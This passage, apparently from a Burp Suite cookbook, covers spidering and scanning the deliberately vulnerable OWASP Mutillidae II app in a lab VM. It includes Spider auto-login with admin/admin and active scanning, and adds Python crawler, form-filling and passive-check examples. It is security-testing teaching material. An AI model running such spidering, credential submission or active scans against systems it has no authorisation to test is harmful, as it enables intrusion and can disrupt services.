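        return 200, ctype, body
    return 404, "text/html", "Not found"


def spider(start, max_depth=5, max_param_per_url=50, check_robots=True,
           request_dir_roots=True, ignore_non_text=True, unparameterised=True):
    """Breadth-first crawl that honours the Crawler Settings options.
    Returns {url: (status, link depth)} in the order the requests were made."""
    queue = deque([(start, 0)])
    seen = {start}
    results = {}
    param_counts = {}   # bare path -> parameterised variants requested so far

    def enqueue(url, depth):
        if url in seen:
            return
        seen.add(url)
        u = urlsplit(url)
        if ignore_non_text and NON_TEXT.search(u.path):
            return
        if u.query:
            base = u._replace(query="").geturl()
            if param_counts.get(base, 0) >= max_param_per_url:
                return
            param_counts[base] = param_counts.get(base, 0) + 1
            if unparameterised:   # also request each dynamic page with no parameters
                enqueue(base, depth)
        if request_dir_roots:     # request the root of every directory on the path
            for i in range(1, len(u.path)):
                if u.path[i] == "/":
                    enqueue(u._replace(path=u.path[:i + 1], query="").geturl(), depth)
        queue.append((url, depth))

    if check_robots:              # robots.txt is a source of content to discover
        status, _, body = fetch(urljoin(start, "/robots.txt"))
        if status == 200:
            for m in re.finditer(r"^(?:Dis)?allow:\s*(\S+)", body, re.MULTILINE | re.IGNORECASE):
                enqueue(urljoin(start, m.group(1)), 1)

    while queue:
        url, depth = queue.popleft()
        status, ctype, body = fetch(url)
        results[url] = (status, depth)
        if depth >= max_depth or not ctype.startswith("text/"):
            continue
        for link in LINK.findall(body):
            enqueue(urljoin(url, link), depth + 1)
    return results


if __name__ == "__main__":
    for url, (status, depth) in spider("http://app.test/").items():
        print(depth, status, url)
```

Running it with `max_depth=2` stops before /docs/deep/2.html, and with `check_robots=False` the /admin/ branch is never found because nothing links to it, which is why the robots.txt option matters for coverage.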


• Passive Spidering: Spiders newly-discovered content in the background 
and is turned on by default: 


[Screenshot: the Passive Spidering panel: "Passive spidering monitors traffic through Burp Proxy to update the site map without making any new requests." Passively spider as you browse (checked); Link depth to associate with Proxy requests: 0]


• Form Submission: It provides the ability to determine how Spider interacts 
with forms. Several options are available including ignore, prompt for 
guidance, submit with default values found in the table provided, or use an 
arbitrary value (for example, 555-555-0199@example.com): 


[Screenshot: the Form Submission panel: "These settings control whether and how the Spider submits HTML forms." Individuate forms by: Action URL, method and fields. Radio buttons: Don't submit forms, Prompt for guidance, Automatically submit using the following rules to assign text field values (selected), followed by a table of field-name patterns and the values assigned to matching fields (phone- and ID-style numbers such as 555-555-0199); Set unmatched fields to: 555-555-0199@example.com; Iterate all values of submit fields - max submissions per form: 10]
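The rules table works as a first-match lookup on the field name, with the "Set unmatched fields to" value as the fallback and one submission per submit button. As an added example (not code from the book or from Burp), the following Python reproduces that behaviour for a constructed contact form. The patterns and values in `FIELD_RULES` are illustrative stand-ins for the table's rows, not Burp's real defaults; the form itself is constructed.

```python
import re

# Constructed rule table in the shape of Burp's Form Submission panel: a regex
# tested against the field's name (and its type as a fallback) and the value to
# assign. The patterns and values are illustrative, not the project's real table.
FIELD_RULES = [
    (r"(?i)e-?mail", "555-555-0199@example.com"),
    (r"(?i)phone|tel|mobile|fax", "555-555-0199"),
    (r"(?i)zip|post(al)?code", "12345"),
    (r"(?i)date|dob", "01/01/1990"),
    (r"(?i)year|yy", "1990"),
    (r"(?i)user|login|name", "Example User"),
]
UNMATCHED_DEFAULT = "555-555-0199@example.com"   # the panel's "Set unmatched fields to" value
MAX_SUBMISSIONS_PER_FORM = 10                   # "max submissions per form"


def value_for_field(name, field_type="text", rules=FIELD_RULES, default=UNMATCHED_DEFAULT):
    """The first rule whose pattern matches the field name (or type) wins;
    fields no rule matches get the default value."""
    for pattern, value in rules:
        if re.search(pattern, name) or re.search(pattern, field_type):
            return value
    return default


def plan_submissions(form, rules=FIELD_RULES, max_submissions=MAX_SUBMISSIONS_PER_FORM):
    """Return the request bodies (as dicts) the spider would submit for one form:
    text-like fields are filled by rule, hidden fields keep their values, and each
    submit button yields its own submission ("Iterate all values of submit fields"),
    capped at max_submissions."""
    base = {}
    submits = []
    for field in form["fields"]:
        ftype = field.get("type", "text")
        if ftype in ("submit", "image"):
            submits.append(field)
        elif ftype == "hidden":
            base[field["name"]] = field.get("value", "")
        elif ftype in ("text", "email", "tel", "search", "password", "textarea"):
            base[field["name"]] = value_for_field(field["name"], ftype, rules)
    if not submits:
        return [dict(base)]
    bodies = []
    for submit in submits[:max_submissions]:
        body = dict(base)
        body[submit["name"]] = submit.get("value", "")
        bodies.append(body)
    return bodies


# Constructed sample form, as a parser would hand it to the spider.
CONTACT_FORM = {"action": "/contact.php", "method": "POST", "fields": [
    {"name": "username", "type": "text"},
    {"name": "contact_email", "type": "text"},
    {"name": "x1", "type": "email"},          # no useful name; matched by its type
    {"name": "phone", "type": "tel"},
    {"name": "comments", "type": "textarea"}, # no rule matches; gets the default
    {"name": "csrf", "type": "hidden", "value": "tok123"},
    {"name": "action", "type": "submit", "value": "Send"},
    {"name": "action", "type": "submit", "value": "Preview"},
]}

if __name__ == "__main__":
    for body in plan_submissions(CONTACT_FORM):
        print(body)
```

Because rule matching is a substring regex search, a broad pattern such as `date` would also claim a field named `update_mode`; keeping the rows specific and ordered from specific to general is what keeps the submitted data plausible to the application.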


• Application Login: It provides the ability to determine how Spider 
interacts with login forms. Several options are available, including ignore, 
prompt for guidance, submit as standard form submission, or use 
credentials provided in text boxes: 


[Screenshot: the Application Login panel: "These settings control how the Spider submits login forms." Radio buttons: Don't submit login forms, Prompt for guidance (selected), Handle as ordinary forms, Automatically submit these credentials]


• Spider Engine: It provides the ability to edit the number of threads used 
along with retry attempt settings due to network failures. Use the number of 
threads judiciously as too many thread requests could choke an application 
and affect its performance: 


[Screenshot: the Spider Engine panel: "These settings control the engine used for making HTTP requests when spidering." Number of threads: 10; Number of retries on network failure: 3; Pause before retry (milliseconds): 2000; Throttle between requests (milliseconds): 0; Add random variations to throttle]
• Request Headers: It provides the ability to modify the way the HTTP 
requests originating from Burp Spider look. For example, a tester can 
modify the user agent to have Spider look like a mobile phone: 


[Screenshot: the Request Headers panel: "These settings control the request headers used in HTTP requests made by the Spider." The header list: Accept: */*; Accept-Language: en; User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0); Connection: close]


How to do it... 


1. Ensure Burp and OWASP BWA VM are running, and Burp is configured in 
the Firefox browser used to view the OWASP BWA applications. 


2. From the OWASP BWA landing page, click the link to the OWASP 
Mutillidae II application: 


[Screenshot: the owaspbwa landing page, "OWASP Broken Web Applications Project, Version 1.2": "This is the VM for the Open Web Application Security Project (OWASP) Broken Web Applications project. It contains many, very vulnerable web applications, which are listed below. More information about this project can be found in the project User Guide and Home Page. For details about the known vulnerabilities in these applications, see https://sourceforge.net/p/owaspbwa/tickets/?limit=999&sort=_severity+asc. !!! This VM has many serious security issues. We strongly recommend that you run it only on the "host only" or "NAT" network in the virtual machine settings !!!" Under TRAINING APPLICATIONS: OWASP WebGoat, OWASP WebGoat.NET, OWASP ESAPI Java SwingSet Interactive, OWASP Mutillidae II, OWASP RailsGoat, OWASP Bricks, OWASP Security Shepherd, Ghost, Magical Code Injection Rainbow, bWAPP, Damn Vulnerable Web Application]


3. Go to the Burp Spider tab, then go to the Options sub-tab, scroll down to 
the Application Login section. Select the Automatically submit these 
credentials radio button. Type into the username textbox the word admin; 
type into the password textbox the word admin: 


[Screenshot: Spider | Options, the Application Login panel with Automatically submit these credentials selected, Username: admin, Password: *****]


4. Return to Target | Site map and ensure the mutillidae folder is added to 
scope by right-clicking the mutillidae folder and selecting Add to scope: 


[Screenshot: Target | Site map, filter bar "Filter: Hiding out of scope and not found items; hiding CSS, image and general binary content", with the tree http://192.168.56.101 > mutillidae expanded to show documentation, framer.html, includes, index.php, javascript, set-up-database.php, and webservices]


5. Optionally, you can clean up the Site map to only show in-scope items by 
clicking Filter: Hiding out of scope and not found items; hiding 
CSS, image and general binary content; hiding 4xx responses; 
hiding empty folders: 


[Screenshot: the Site map filter bar: "Filter: Hiding out of scope and not found items; hiding CSS, image and general binary content; hiding 4xx responses; hiding empty folders"]


6. After clicking Filter: ..., you will see a drop-down menu appear. In this 
drop-down menu, check the Show only in-scope items box. Now, click 
anywhere in Burp outside of the drop-down menu to have the filter 
disappear again: 


[Screenshot: the Site map filter drop-down: Filter by request type (Show only in-scope items, Show only requested items, Show only parameterized requests, Hide not-found items), Filter by MIME type (HTML, Other text, Script, Images, XML, Flash, CSS, Other binary), Filter by status code (2xx [success], 3xx [redirection], 4xx [request error], 5xx [server error]), Folders (Hide empty folders), Filter by search term (with Regex, Case sensitive, and Negative search options), Filter by file extension (Show only: asp,aspx,jsp,php; Hide: js,gif,jpg,png,css), Filter by annotation (Show only commented items, Show only highlighted items), and Show all, Hide all, and Revert changes buttons]


7. You should now have a clean Site map. Right-click the mutillidae folder 
and select Spider this branch. 


If prompted to allow out-of-scope items, click Yes. 


[Screenshot: the Target | Site map context menu for http://192.168.56.101/mutillidae, showing Remove from scope, Spider this branch, Actively scan this branch, Passively scan this branch, Engagement tools, and Compare site maps]


8. You should immediately see the Spider tab turn orange: 


9. Go to the Spider | Control tab to see the number of requests, bytes 
transferred, and forms in queue: 


[Screenshot: Spider | Control, the Spider Status panel: Spider is running and Clear queues buttons; Requests made: 31; Bytes transferred: 1,798,761; Requests queued: 0; Forms queued: 0]


Let Spider finish running. 


10. Notice that Spider logged into the application using the credentials you 
provided in the Options tab. On Target | Site map, look for 
the /mutillidae/index.php/ folder structure: 


[Screenshot: Target | Site map (filter: Hiding not found items; hiding CSS, image and general binary content) with http://192.168.56.101 > mutillidae expanded to show documentation, framer.html, includes, and further entries]


11. Search for an envelope icon that contains 
password=admin&login-php-submit-button=Login&username=admin: 


[Screenshot: Target | Site map under /mutillidae/index.php/, listing page=... entries (page=robots-txt.php, page=secret-administrative-pages.php, page=set-background-color.php, page=show-log.php, page=site-footer-xss-discussion.php, page=source-viewer.php, page=sqlmap-targets.php, page=ssl-misconfiguration.php, page=styling-frame.php..., page=text-file-viewer.php, page=upload-file.php, page=usage-instructions.php, page=user-agent-impersonation.php, page=user-info-xpath.php, page=user-info.php, page=user-poll.php, page=view-someones-blog.php, page=view-user-privilege-level.php...) and, in the Request | Raw tab, the login request Spider submitted:]

POST /mutillidae/index.php?page=login.php HTTP/1.1 
Host: 192.168.56.101 
Accept-Encoding: gzip, deflate 
Accept: */* 
Accept-Language: en 
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) 
Connection: close 
Referer: http://192.168.56.101/mutillidae/index.php?page=login.php 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 59 
Cookie: showhints=1; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=upg8fmnlorrmvoh4nf4beSg312 

password=admin&login-php-submit-button=Login&username=admin 


This is evidence that Spider logged in using the credentials you provided in the Spider | Options | Application Login section.


Scanning with Scanner 


Scanner capabilities are only available in Burp Professional edition. 


Burp Scanner is a tool that automates the search for weaknesses within the 
runtime version of an application. Scanner attempts to find security 
vulnerabilities based on the behavior of the application. 


Scanner will identify indicators that may lead to the identification of a security 
vulnerability. Burp Scanner is extremely reliable, however, it is the responsibility 
of the pentester to validate any findings prior to reporting. 


There are two scanning modes available in Burp Scanner: 


• Passive scanner: Analyzes traffic passing through the proxy listener. This is why it's so important to properly configure your target scope so that you aren't scanning more than is necessary.

• Active scanner: Sends numerous requests that are tweaked from their original form. These request modifications are designed to trigger behavior that may indicate the presence of vulnerabilities (https://portswigger.net/kb/issues). Active scanner is focused on input-based bugs that may be present on the client and server side of the application.


Scanning tasks should occur after spidering is complete. Previously, we learned 
how Spider continues to crawl as new content is discovered. Similarly, passive 
scanning continues to identify vulnerabilities as the application is crawled. 
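To make the passive mode concrete, here is an added example (not code from this book or from Burp) that runs five of the passive checks listed in the Issue activity table of this section over a constructed response for the Mutillidae login page: it parses the raw response, then examines the Set-Cookie, X-Frame-Options/Content-Security-Policy and Content-Type headers and the login form. The issue names, severities and confidence levels are the ones Burp reports; the detection logic, the sample response and the hardened variant are this example's own.

```python
# Added example: passive checks modelled on the Issue activity findings. The
# issue names and levels are Burp's; the detection logic is this example's own.
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple
from urllib.parse import urljoin, urlsplit

FORM = re.compile(r"<form\b[^>]*>(.*?)</form>", re.I | re.S)
PASSWORD_INPUT = re.compile(r"<input\b[^>]*type\s*=\s*[\"']?password\b[^>]*>", re.I)
AUTOCOMPLETE_OFF = re.compile(r"autocomplete\s*=\s*[\"']?off\b", re.I)


@dataclass(frozen=True)
class Issue:
    name: str        # Burp's issue name
    severity: str    # High, Medium, Low or Information
    confidence: str  # Certain, Firm or Tentative
    detail: str      # where it was seen


def parse_response(raw: str) -> Tuple[Dict[str, List[str]], str]:
    """Split a raw HTTP response into lower-cased headers (a list per name,
    since Set-Cookie may repeat) and the body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    headers: Dict[str, List[str]] = {}
    for line in head.split("\n")[1:]:  # skip the status line
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers, body


def passive_checks(url: str, raw_response: str) -> List[Issue]:
    """Run five of Burp's passive checks on one request URL / response pair."""
    headers, body = parse_response(raw_response)
    issues: List[Issue] = []
    # Cookie without HttpOnly flag set: inspect every Set-Cookie header.
    for cookie in headers.get("set-cookie", []):
        attrs = [a.strip().lower() for a in cookie.split(";")[1:]]
        if "httponly" not in attrs:
            issues.append(Issue("Cookie without HttpOnly flag set", "Low",
                                "Firm", cookie.split("=", 1)[0]))
    content_types = headers.get("content-type", [])
    if not any("text/html" in ct.lower() for ct in content_types):
        return issues  # the remaining checks apply to HTML pages only
    # Frameable response: neither X-Frame-Options nor a CSP frame-ancestors
    # directive restricts which origins may embed the page in an iframe.
    csp = " ".join(headers.get("content-security-policy", [])).lower()
    if "x-frame-options" not in headers and "frame-ancestors" not in csp:
        issues.append(Issue("Frameable response (potential Clickjacking)",
                            "Information", "Firm", url))
    # HTML does not specify charset: no encoding in the header or a <meta> tag.
    if (not any("charset=" in ct.lower() for ct in content_types)
            and not re.search(r"<meta\b[^>]*charset\s*=", body, re.I)):
        issues.append(Issue("HTML does not specify charset", "Information",
                            "Certain", url))
    for form in FORM.finditer(body):
        form_tag = form.group(0)[: form.group(0).index(">") + 1]
        password_inputs = PASSWORD_INPUT.findall(form.group(1))
        if not password_inputs:
            continue
        # Cleartext submission of password: the form's target is plain http.
        action = re.search(r"action\s*=\s*[\"']?([^\"'\s>]+)", form_tag, re.I)
        target = urljoin(url, action.group(1) if action else "")
        if urlsplit(target).scheme.lower() == "http":
            issues.append(Issue("Cleartext submission of password", "High",
                                "Certain", target))
        # Password field with autocomplete enabled: neither the input nor the
        # form sets autocomplete="off", so the browser may store the password.
        for field in password_inputs:
            if not (AUTOCOMPLETE_OFF.search(field) or AUTOCOMPLETE_OFF.search(form_tag)):
                issues.append(Issue("Password field with autocomplete enabled",
                                    "Low", "Certain", field))
    return issues


# Constructed sample modelled on the Mutillidae login page (not a real capture).
SAMPLE_URL = "http://192.168.56.101/mutillidae/index.php?page=login.php"
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nSet-Cookie: PHPSESSID=constructedsessionid; path=/\r\n"
    "Content-Type: text/html\r\n\r\n"
    '<html><body><form action="index.php?page=login.php" method="POST">'
    '<input type="text" name="username"><input type="password" name="password">'
    '<input type="submit" name="login-php-submit-button" value="Login">'
    "</form></body></html>"
)
# The same page with the remediations applied: HttpOnly cookie, framing denied,
# charset declared, served over HTTPS, autocomplete disabled on the form.
HARDENED_URL = "https://192.168.56.101/mutillidae/index.php?page=login.php"
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: PHPSESSID=constructedsessionid; path=/; Secure; HttpOnly\r\n"
    "X-Frame-Options: DENY\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n"
    '<html><body><form action="index.php?page=login.php" method="POST" '
    'autocomplete="off"><input type="password" name="password"></form></body></html>'
)
```

Calling passive_checks(SAMPLE_URL, SAMPLE_RESPONSE) returns the five findings in the order listed above, and the hardened page returns none.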


Within the Scanner tab, a tester has the following sub-tabs: Issue activity, Scan queue, Live scanning, Issue definitions, and Options:


• Issue Activity: Displays all scanner findings in a tabular format; includes both passive and active scanner issues:


[Screenshot: Scanner | Issue activity table]

#   Time                  Action       Issue type                                   Host                   Path                   Severity
9   14:50:04 28 Aug 2018  Issue found  Cookie without HttpOnly flag set             http://192.168.56.101  /mutillidae/           Low
10  14:50:04 28 Aug 2018  Issue found  Path-relative style sheet import             http://192.168.56.101  /mutillidae/           Information
11  14:50:04 28 Aug 2018  Issue found  HTML does not specify charset                http://192.168.56.101  /mutillidae/           Information
12  15:17:37 28 Aug 2018  Issue found  Frameable response (potential Clickjacking)  http://192.168.56.101  /mutillidae/index.php  Information
13  15:17:37 28 Aug 2018  Issue found  Cleartext submission of password             http://192.168.56.101  /mutillidae/index.php  High
14  15:17:37 28 Aug 2018  Issue found  Password field with autocomplete enabled     http://192.168.56.101  /mutillidae/index.php  Low
15  15:17:37 28 Aug 2018  Issue found  Path-relative style sheet import             http://192.168.56.101  /mutillidae/index.php  Information
16  15:17:37 28 Aug 2018  Issue found  Cross-domain Referer leakage                 http://192.168.56.101  /mutillidae/index.php  Information


By selecting an issue in the table, the message details are displayed, 
including an advisory specific to the finding as well as message-editor 
details related to the request and response: 


[Screenshot: Scanner | Issue activity, detail pane for the selected issue]

Issue: Frameable response (potential Clickjacking)
Severity: Information
Confidence: Firm
Host: http://192.168.56.101
Path: /mutilli... (truncated in the screenshot)

Issue description

If a page fails to set an appropriate X-Frame-Options or Content-Security-Policy HTTP header, it might be possible for a page controlled by an attacker to load it within an iframe. This may enable a clickjacking attack, in which the attacker's page overlays the target application's interface with a different interface provided by the attacker. By inducing victim users to perform actions such as mouse clicks and keystrokes, the attacker can cause them to unwittingly carry out actions within the application that is being targeted. This technique allows the attacker to circumvent defenses against cross-site request forgery, and may result in unauthorized actions.

Note that some applications attempt to prevent these attacks from within the HTML page itself, using "framebusting" code. However, this type of defense is normally ineffective and can usually be circumvented by a skilled attacker.

You should determine whether any functions accessible within frameable pages can be used by application users to perform any sensitive actions within the application.

Issue remediation

To effectively prevent framing attacks, the application should return a response header with the name X-Frame-Options and the value DENY to prevent framing altogether, or the value SAMEORIGIN to allow framing only by pages on the same origin as the response itself. Note that the SAMEORIGIN header can be partially bypassed if the application itself can be made to frame untrusted websites.


• Scan queue: Displays the status of the active scans that are running; provides a percentage of completion and the number of threads running, as well as the number of requests sent, insertion points tested, start time, end time, targeted host, and URL attacked.


Scanner can be paused from the table by right-clicking and selecting Pause scanner; likewise, it can be resumed by right-clicking and selecting Resume scanner. Items waiting in the scan queue can be cancelled as well:


[Screenshot: Scanner | Scan queue table with columns #, Host, URL, Status, Issues, Requests, Errors, Insertion points, Start time, and End time; rows for http://192.168.56.101 paths under /mutillidae/ (/, documentation/..., framer.html, includes/pop-up-help-context-generator.php), mostly 0% complete, all started 03:43:57 29 Aug 2018]


• Live Active Scanning: It allows customization of when active scanner performs scanning activities:


[Screenshot: Scanner | Live scanning | Live Active Scanning. "Automatically scan the following targets as you browse. Active scan checks send various malicious requests designed to identify common vulnerabilities. Use with caution." Radio buttons: Don't scan (selected), Use suite scope [defined in Target tab], Use custom scope]


• Live Passive Scanning: It allows customization of when passive scanner performs scanning activities. By default, passive scanner is always on and scans everything:


[Screenshot: Scanner | Live scanning | Live Passive Scanning. "Automatically scan the following targets as you browse. Passive scan checks analyze your existing traffic for evidence of vulnerabilities, and do not send any new requests to the target." Radio buttons: Don't scan, Scan everything (selected), Use suite scope [defined in Target tab], Use custom scope]


• Issue definitions: It displays definitions for all vulnerabilities known to Burp scanners (active and passive). The list can be expanded through extenders but, using Burp core, this is the exhaustive listing, which includes title, description text, remediation verbiage, references, and severity level:


[Screenshot: Scanner | Issue definitions. "This listing contains the definitions of all issues that can be detected by Burp Scanner." Table columns: issue name, typical severity, and type ID. Entries run alphabetically from ASP.NET debugging enabled (Medium) and ASP.NET tracing enabled (High), through the Ajax request header manipulation, Base64-encoded data in parameter, Browser cross-site scripting filter disabled, CSS injection, Cacheable HTTPS response, Cleartext submission of password (High), Client-side HTTP parameter pollution, Client-side JSON/SQL/XPath injection, Client-side template injection (High), Content type incorrectly stated, and Content type is not specified entries, to Cookie manipulation (DOM-based and reflected DOM-based)]




[Screenshot: detail pane for a selected issue definition]

ASP.NET ViewState without MAC enabled

Description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialized by the server and transmitted via a hidden form field. When it is posted back to the server, the ViewState parameter is deserialized and the data is retrieved.

By default, the serialized value is signed by the server to prevent tampering by the user; however, this behavior can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialized and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

The contents of the deserialized ViewState should be reviewed to determine whether it contains any critical items that can be manipulated to attack the application.

Remediation

There is no good reason to disable the default ASP.NET behavior in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

Vulnerability classifications

CWE-642: External Control of Critical State Data

Typical severity

Low


• Options: Several sections are available, including Attack Insertion Points, Active Scanning Engine, Attack Scanning Optimization, and Static code analysis.


o Attack Insertion Points: It allows customization of Burp insertion points; an insertion point is a placeholder for payloads within different locations of a request. This is similar to the Intruder payload marker concept discussed in Chapter 2, Getting to Know the Burp Suite of Tools:


[Screenshot: Scanner | Options | Attack Insertion Points. "Place attacks into the following locations within requests:" URL parameter values; Body parameter values; Cookie parameter values; Parameter name; HTTP headers; Entire body (for relevant content types); AMF string parameters (use with caution); URL path filename; URL path folders. "Change parameter locations (causes many more scan requests):" URL to body; URL to cookie; Body to URL; Body to cookie; Cookie to URL; Cookie to body. "Nested insertion points are used when an insertion point's base value contains data in a recognized format (for example, XML data within a URL parameter):" Use nested insertion points. Maximum insertion points per base request: 30. "Skip server-side injection tests for these parameters:" a list of Body parameter entries and one Any parameter entry, with Add and Remove buttons. "Skip all tests for these parameters:" empty]


Recommendations here include adding the URL-to-body, Body-to-URL, Cookie-to-URL, URL-to-cookie, Body-to-cookie, and Cookie-to-body insertion points when performing an assessment. This allows Burp to fuzz almost all, if not all, available parameters in any given request.


o Active Scanning Engine: It provides the ability to configure the number of threads (the Concurrent request limit) scanner will run against the target application. This thread count, compounded with the permutations of insertion points, can create noise on the network and a possible denial of service (DoS) condition, depending upon the stability of the target application. Use caution and consider lowering the Concurrent request limit. The throttling of threads is available in this configuration section as well:


[Screenshot: Scanner | Options | Active Scanning Engine. "These settings control the engine used for making HTTP requests when doing active scanning." Concurrent request limit: 10; Number of retries on network failure: 3; Pause before retry (milliseconds): 2000; Throttle between requests (milliseconds): unchecked; Follow redirections where necessary: checked]


o Attack Scanning Optimization: It provides three settings each for scan speed and scan accuracy.
▪ Available Scan speed settings include Normal, Fast, and Thorough. Fast makes fewer requests and checks for fewer derivations of issues; Thorough makes more requests and checks for more derivations of issues. Normal is the medium setting between the other two choices. The recommendation for Scan speed is Thorough.

▪ Available Scan accuracy settings include Normal, Minimize false negatives, and Minimize false positives. Scan accuracy relates to the amount of evidence scanner requires before reporting an issue. The recommendation for Scan accuracy is Normal:


[Screenshot: Scanner | Options | Active Scanning Optimization. "These settings let you control the behavior of the active scanning logic to reflect the objectives of the scan and the nature of the target application." Scan speed: Normal; Scan accuracy: Normal; Use intelligent attack selection: checked]


o Static Code Analysis: It provides the ability to perform static analysis 
of binary code. By default, this check is performed in active scanner: 


[Screenshot: Scanner | Options | Static Code Analysis. "These settings control the types of scanning that will include static analysis of executable code. Note that static analysis can consume large amounts of memory and processing, and so it may be desirable to restrict static analysis to key targets of interest." Radio buttons: Active scanning only (selected), Active and passive scanning, Don't perform static code analysis. Maximum analysis time per item (seconds): 120]


• Scan Issues: It provides the ability to set which vulnerabilities are tested and for which scanner (that is, passive or active). By default, all vulnerability checks are enabled:


[Screenshot: Scanner | Options | Scan Issues. "These settings control which issues Burp will check for. You can select issues by scan type or individually. If you select individual issues, you can also select the detection methods that are used for some types of issues." Select by scan type: Passive, Light active, Medium active, Intrusive active, Static code analysis (all checked). Select individual issues: a table with Filter, Passive, Light, Medium, Intrusive, and Static columns and a Search box, listing each issue with its severity and type ID, for example Unidentified code injection (High, 0x00101000), Server-side template injection (High, 0x00101080), SSI injection (High, 0x00101100, All methods enabled), Cross-site scripting (stored) (High, 0x00200100, All methods enabled), HTTP response header injection (High, 0x00200200), Cross-site scripting (reflected) (High, 0x00200300, All methods enabled), Client-side template injection (High, 0x00200308), Cross-site scripting (DOM-based) (High, 0x00200310), JavaScript injection (DOM-based) (High, 0x00200320), Path-relative style sheet import (Information, 0x00200328), and Client-side SQL injection (DOM-based) (High, 0x00200330)]


Getting ready


Using the OWASP Mutillidae II application found within the OWASP BWA VM, we will begin our scanning process and monitor our progress using the Scan queue tab.


How to do it... 


Ensure that Burp and the OWASP BWA VM are running, and that the Firefox browser used to view the OWASP BWA applications is configured to use Burp.


From the OWASP BWA landing page, click the link to the OWASP Mutillidae II 
application: 


1. From the Target | Site map tab, right-click the mutillidae folder and select 
Passively scan this branch. The passive scanner will hunt for vulnerabilities, 
which will appear in the Issues window: 


[Screenshot: Target | Site map, right-click menu on http://192.168.56.101/mutillidae showing Spider this branch, Actively scan this branch, Passively scan this branch, Engagement tools, Compare site maps, and Expand branch]


2. From the Target | Site map tab, right-click the mutillidae folder and select 
Actively scan this branch: 


[Screenshot: Target | Site map, right-click menu on http://192.168.56.101/mutillidae with Actively scan this branch highlighted]


3. Upon initiating the active scanner, a pop-up dialog box appears prompting 
for removal of duplicate items, items without parameters, items with media 
response, or items of certain file types. This pop-up is the Active scanning 
wizard. For this recipe, use the default settings and click Next: 


[Screenshot: Active scanning wizard, first screen. "You have selected 104 items for active scanning. Before continuing, you can use the filters below to remove certain categories of items, to make your scanning more targeted and efficient." Checkboxes: Remove duplicate items (same URL and parameters) [62 items]; Remove items already scanned (same URL and parameters) [all 104 items]; Remove out-of-scope items [0 items]; Remove items with no parameters [17 items]; Remove items with media responses [0+ items]; Remove items with the following extensions [6 items]: js,gif,jpg,png,css. "Note: Some of the selected items do not yet have responses. If you choose to remove items with media responses, some of these items may be removed from the scan when their responses have been analyzed." Cancel and Next buttons]


4. Verify all paths shown are desired for scanning. Any undesired file types or paths can be removed with the Remove button. Once complete, click OK:


[Screenshot: Active scanning wizard, second screen. "Review the items you have selected for scanning. Double-click items to view full details. You can remove individual items which you do not wish to scan, or go back to modify your general filters." Table columns: Host, Method, URL, Params, and a truncated column; rows are GET requests to http://192.168.56.101 such as /mutillidae/, /mutillidae/?page=add-to-your-blog.php, /mutillidae/documentation/mutillidae-installation-on-xam..., /mutillidae/framer.html, /mutillidae/includes/pop-up-help-context-generator.php, /mutillidae/index.php, /mutillidae/index.php?do=logout, and /mutillidae/index.php?do=toggle-bubble-hints&page=... 32 items; Remove and Revert buttons. "Note: You have selected to remove items with media responses. Some of the above items do not yet have responses and so may be removed from the scan when their responses have been analyzed."]


You may be prompted regarding the out-of-scope items. If so, click Yes 
to include those items. Scanner will begin. 


5. Check the status of scanner by looking at the Scan queue tab:


[Screenshot: Scanner | Scan queue. Columns: #, Host, URL, Status, Issues, Requests, Errors, Insertion points. Rows 54 to 63, all for http://192.168.56.101: /mutillidae/webservices/soap/ws-hello-world.php finished (567 requests); /mutillidae/ 0% complete; /mutillidae/documentation/mutillidae-installation-on-xam... 0% complete; /mutillidae/framer.html finished (3 issues, 487 requests); /mutillidae/includes/pop-up-help-context-generator.php 10% complete (1 issue) and two further entries for the same path at 0% complete; /mutillidae/index.php waiting]


6. As scanner finds issues, they are displayed on the Target tab, in the Issues panel. This panel is only available in the Professional edition since it complements the scanner's functionality:


[Screenshot: Target | Site map with the Issues panel. The tree for http://192.168.56.101/mutillidae lists /, documentation, framer.html, includes, index.php, javascript, level-1-hints-page-wrapper.php, set-up-database.php, and webservices; the filter bar reads "Hiding out of scope and not found items; hiding CSS, image and general binary content; hiding 4xx responses; hiding empty folders", and the Contents table lists the GET requests for those paths.]

Issues
SQL injection
Cross-site scripting (reflected) [4]
Cleartext submission of password
Cookie without HttpOnly flag set
XPath injection
Password field with autocomplete enabled
Input returned in response (reflected) [17]
Cross-domain Referer leakage [3]
HTML does not specify charset [6]
Frameable response (potential Clickjacking) [8]
Link manipulation (reflected) [2]
Path-relative style sheet import [3]

The selected request:

GET /mutillidae/ HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.101/
Connection: close
Upgrade-Insecure-Requests: 1

The selected issue's advisory:

Issue: SQL injection
Severity: High
Confidence: Certain
Host: http://192.168.56.101

Issue detail
2 instances of this issue were identified, at the following locations:
/mutillidae/includes/pop-up-help-context-generator.php [pagename parameter]
/mutillidae/level-1-hints-page-wrapper.php [level1HintIncludeFile parameter]

Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input... (truncated in the screenshot)


Reporting issues 


Reporting capabilities are only available in Burp Professional edition. 


In Burp Professional, as scanner discovers a vulnerability, it will be added to a 
list of issues found on the Target tab, in the right-hand side of the UI. Issues are 
color-coded to indicate the severity and confidence level. An issue with a red 
